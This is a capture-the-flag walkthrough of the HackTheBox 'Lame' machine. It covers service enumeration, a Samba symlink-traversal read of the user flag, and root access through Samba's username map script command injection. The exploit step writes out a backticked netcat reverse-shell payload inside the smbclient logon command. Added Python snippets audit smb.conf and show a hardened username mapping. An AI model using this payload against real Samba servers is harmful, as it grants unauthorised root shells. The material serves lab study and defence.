Walkthrough - Lame on HackTheBox


After spending a bit of time on HackTheBox's starting ground machines, it's time to root my first machine sans hints as I begin to prepare myself for my OSCP!

Nmap

Let's start with a port scan:

nmap -v -sV -Pn box.htb

PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 2.3.4
22/tcp open ssh OpenSSH 4.7p1 Debian 8ubuntu1 (protocol 2.0)
139/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
3632/tcp open distccd distccd v1 ((GNU) 4.2.4 (Ubuntu 4.2.4-1ubuntu4))
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

Note: box.htb has been configured to point to the machine in /etc/hosts on Kali

We can see that the machine has FTP, SSH, Samba and distccd services exposed. Let's have a closer look at the FTP service first:

vsFTPd 2.3.4

This is the classic backdoored release of vsFTPd: a malicious backdoor was inserted into the 2.3.4 source distribution. An exploit for it is available in Metasploit, or alternatively as a Python exploit script.

However, I did not obtain a shell when running the Python exploit script, so I tried again with Metasploit, but to no avail.

Let's move on and have a look at Samba:

Samba

Samba is an open-source implementation of the SMB/CIFS protocol that lets Unix machines share files and other resources (e.g. printers) with Windows computers.

Using smbmap we are able to list out the available shares:

smbmap -H box.htb

[+] IP: box.htb:445.    Name: unknown
    Disk         Permissions    Comment
    ----         -----------    -------
    print$       NO ACCESS      Printer Drivers
    tmp          READ, WRITE    oh noes!
    opt          NO ACCESS
    IPC$         NO ACCESS      IPC Service (lame server (Samba 3.0.20-Debian))
    ADMIN$       NO ACCESS      IPC Service (lame server (Samba 3.0.20-Debian))

The tmp share grants the anonymous user both read and write privileges, has a suspicious comment and is worth looking into.

Let's list out the contents of the tmp share:

smbmap -H box.htb -r tmp/
[+] IP: box.htb:445.    Name: unknown
    Disk                                    Permissions    Comment
    ----                                    -----------    -------
    tmp                                     READ, WRITE
    .\tmp\*
    dr--r--r--                0 Tue Aug 16 01:25:52 2022    .
    dw--w--w--                0 Sat Oct 31 02:33:57 2020    ..
    dr--r--r--                0 Tue Aug 16 01:01:40 2022    .ICE-unix
    dw--w--w--                0 Tue Aug 16 01:02:06 2022    vmware-root
    dr--r--r--                0 Tue Aug 16 01:02:06 2022    .X11-unix
    fw--w--w--               11 Tue Aug 16 01:02:06 2022    .X0-lock
    fw--w--w--                0 Tue Aug 16 01:02:43 2022    5565.jsvc_up
    fw--w--w--             1600 Tue Aug 16 01:01:39 2022    vgauthsvclog.txt.0

The files in the tmp share can be downloaded using the following command, but the contents don't appear to be very useful:

smbmap -H box.htb --download tmp/<filename>

After a bit of digging, it appears that this version of Samba is vulnerable to a Symlink Traversal attack, as explained in this article from Null-Byte.

Let's try and exploit this using Metasploit:

msf6 > use samba symlink
msf6 auxiliary(admin/smb/samba_symlink_traversal) > set RHOSTS box.htb
msf6 auxiliary(admin/smb/samba_symlink_traversal) > set SMBSHARE tmp
msf6 auxiliary(admin/smb/samba_symlink_traversal) > run

The module creates a symbolic link named rootfs inside the writable tmp share that points at /, so the anonymous share now exposes the root filesystem, subject only to the file permissions smbd enforces.

Let's try and obtain the user flag:

smbmap -H box.htb --download tmp/rootfs/home/makis/user.txt
[+] Starting download: tmp\rootfs\home\makis\user.txt (33 bytes)
[+] File output to: /home/kali/Documents/Lame/box.htb-tmp_rootfs_home_makis_user.txt

nano *user.txt
d7f860**************************

We don't have permissions to access the root flag, so we'll have to escalate our privileges.
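A configuration-side check for the two Samba settings that made the symlink traversal above possible, added here as an example and not part of the original walkthrough; the smb.conf text is constructed to resemble this box, not copied from it.

```python
import configparser

# Constructed smb.conf modelled on what this box exposes; it is not the file from the machine.
SAMPLE_SMB_CONF = """
[global]
   workgroup = WORKGROUP
   server string = lame server
   wide links = yes
   unix extensions = yes

[tmp]
   comment = oh noes!
   path = /tmp
   guest ok = yes
   writable = yes
"""

def _truthy(value):
    return str(value).strip().lower() in ("yes", "true", "1")

def load_smb_conf(text):
    """Parse smb.conf; indentation is stripped first so configparser does not treat
    indented options as continuation lines of the previous value."""
    cp = configparser.ConfigParser(interpolation=None, strict=False)
    cp.read_string("\n".join(line.strip() for line in text.splitlines()))
    return cp

def audit_smb_conf(text):
    """Return findings for the conditions behind the symlink traversal above: the
    global symlink settings, and any share an anonymous user can write to."""
    cp = load_smb_conf(text)
    glob = cp["global"] if cp.has_section("global") else {}
    findings = []
    # Both defaulted to 'yes' in the Samba 3.0 series; together they let a client create
    # a symlink inside a writable share that smbd will then follow out of the share.
    if _truthy(glob.get("wide links", "yes")) and _truthy(glob.get("unix extensions", "yes")):
        findings.append("global: wide links + unix extensions let symlinks escape the share")
    for share in cp.sections():
        if share == "global":
            continue
        s = cp[share]
        writable = (_truthy(s.get("writable", s.get("writeable", "no")))
                    or s.get("read only", "yes").strip().lower() == "no")
        if _truthy(s.get("guest ok", "no")) and writable:
            findings.append(f"{share}: anonymous write access to {s.get('path', '?')}")
    return findings
```

Setting wide links = no (the default in current Samba) or removing guest write access from the share clears the respective finding.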

Samba Privilege Escalation

This article by MrNmap shows that we can leverage the logon command in smbclient to obtain a privileged reverse shell.

Set Up a Netcat Reverse Shell Listener

First, we check our attacking machine's IP:

ifconfig
tun0: flags=4305<UP,POINTOPOINT,RUNNING,NOARP,MULTICAST>  mtu 1500
        inet <attacker-ip>  netmask 255.255.254.0  destination 10.10.10.10

Now we can configure netcat on our machine to listen for a reverse shell:

nc -nvlp 1234
listening on [any] 1234 ...

Trigger Reverse Shell with smbclient

Next, let's fire up smbclient and try to list out the shares. When attempting this, I ran into an issue with smbclient where I was unable to connect to the tmp share.

smbclient //box.htb/tmp
protocol negotiation failed: NT_STATUS_CONNECTION_DISCONNECTED

This is caused by a secure default in modern smbclient, which refuses to negotiate anything older than SMB2, while this Samba 3.0.20 server only speaks SMB1. It can be fixed by inserting the following line under the [global] section in /etc/samba/smb.conf on the attacking machine:

client min protocol = CORE

Once that's out of the way, we connect to the tmp share. When prompted for a password, just hit enter, since we are logging in as an anonymous user.

smbclient //box.htb/tmp
Enter WORKGROUP\kali's password:
Anonymous login successful
Try "help" to get a list of possible commands.

When we type help we get a list of commands we can execute:

help
?              allinfo        altname        archive        backup         
blocksize      cancel         case_sensitive cd             chmod          
chown          close          del            deltree        dir            
du             echo           exit           get            getfacl        
geteas         hardlink       help           history        iosize         
lcd            link           lock           lowercase      ls             
l              mask           md             mget           mkdir          
more           mput           newer          notify         open           
posix          posix_encrypt  posix_open     posix_mkdir    posix_rmdir    
posix_unlink   posix_whoami   print          prompt         put            
pwd            q              queue          quit           readlink       
rd             recurse        reget          rename         reput          
rm             rmdir          showacls       setea          setmode        
scopy          stat           symlink        tar            tarmode        
timeout        translate      unlock         volume         vuid           
wdel           logon          listconnect    showconnect    tcon           
tdis           tid            utimes         logoff         ..

Note that the logon command is listed towards the end of the second column. Now, we simply have to execute the following command to trigger a reverse shell:

logon "/=`nc '<attacker-ip>' 1234 -e /bin/bash`"

We can see that our netcat listener receives a reverse shell:

connect to [<attacker-ip>] from (UNKNOWN) [<victim-ip>] 40386

The raw shell is fragile and drops easily, but we can stabilise it by spawning an interactive PTY with Python:

python3 -c 'import pty;pty.spawn("/bin/bash")'
whoami
root

And we have shell! Now for the final root flag: *drumroll please*

cat /root/root.txt
fe16e6**************************

And that's a wrap!

Why does this work?

You might be wondering why we were able to trigger a reverse shell using the smbclient logon command. This is because the machine is running Samba version 3.0.20-Debian, which is vulnerable to a command execution vulnerability in its username map script option.

By specifying a username containing shell meta characters, attackers can execute arbitrary commands. No authentication is needed to exploit this vulnerability since this option is used to map usernames prior to authentication!

Source: https://www.rapid7.com/db/modules/exploit/multi/samba/usermap_script/

Command explanation:

logon <username> <password>
           Establishes a new vuid for this session by logging on again. Replaces the current vuid. Prints
           out the new vuid. Used for internal Samba testing purposes.  

Our exploitation placed a netcat reverse shell, wrapped in backticks, in the username field of the logon command. Samba handed that username to its configured username map script through the shell, which expanded the backticks and ran netcat with smbd's privileges, i.e. as root.
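As an added example (not code from the walkthrough, from Samba or from the Rapid7 module), the pattern behind this bug beside a hardened form of the same hook: a constructed map script is invoked with the username as a single argv element after an allowlist check, so the backticked payload above is rejected instead of interpreted. The script path and allowlist are assumptions for the demonstration.

```python
import os
import re
import subprocess
import tempfile

# Constructed stand-in for a 'username map script': it just echoes the name it receives as $1.
MAP_SCRIPT_BODY = '#!/bin/sh\nprintf "mapped:%s\\n" "$1"\n'

# The payload from this walkthrough, with the listener address left as a placeholder.
BACKTICK_PAYLOAD = "/=`nc '<attacker-ip>' 1234 -e /bin/bash`"

# Allowlist for names that may reach the hook: letters, digits, '.', '_', '-', '@' and the
# DOMAIN\user separator; everything a shell could interpret is excluded (assumed policy).
_SAFE_NAME = re.compile(r"^[A-Za-z0-9][A-Za-z0-9._@\\-]{0,63}$")
_SHELL_META = "`$;|&<>(){}'\"\n"

def unsafe_characters(username):
    """Shell metacharacters present in a username; handy for logging rejected session setups."""
    return sorted({c for c in username if c in _SHELL_META})

def vulnerable_command_line(script, username):
    """The pattern behind the bug: the name is spliced into a string handed to /bin/sh -c.
    Returned rather than executed, so the reader can see the backticks a shell would honour."""
    return f"/bin/sh {script} {username}"

def map_username(script, username):
    """Hardened replacement: reject anything outside the allowlist, then run the script with
    the name as one argv element and no shell, so metacharacters are never interpreted."""
    if not _SAFE_NAME.match(username):
        raise ValueError(f"username rejected, contains {unsafe_characters(username)}")
    result = subprocess.run(["/bin/sh", script, username],
                            capture_output=True, text=True, check=True)
    return result.stdout.strip()

def demo():
    """Run both names through the hardened hook; returns (mapped legit name, payload rejected?)."""
    with tempfile.NamedTemporaryFile("w", suffix=".sh", delete=False) as fh:
        fh.write(MAP_SCRIPT_BODY)
        path = fh.name
    try:
        mapped = map_username(path, "makis")
        try:
            map_username(path, BACKTICK_PAYLOAD)
            rejected = False
        except ValueError:
            rejected = True
    finally:
        os.unlink(path)
    return mapped, rejected
```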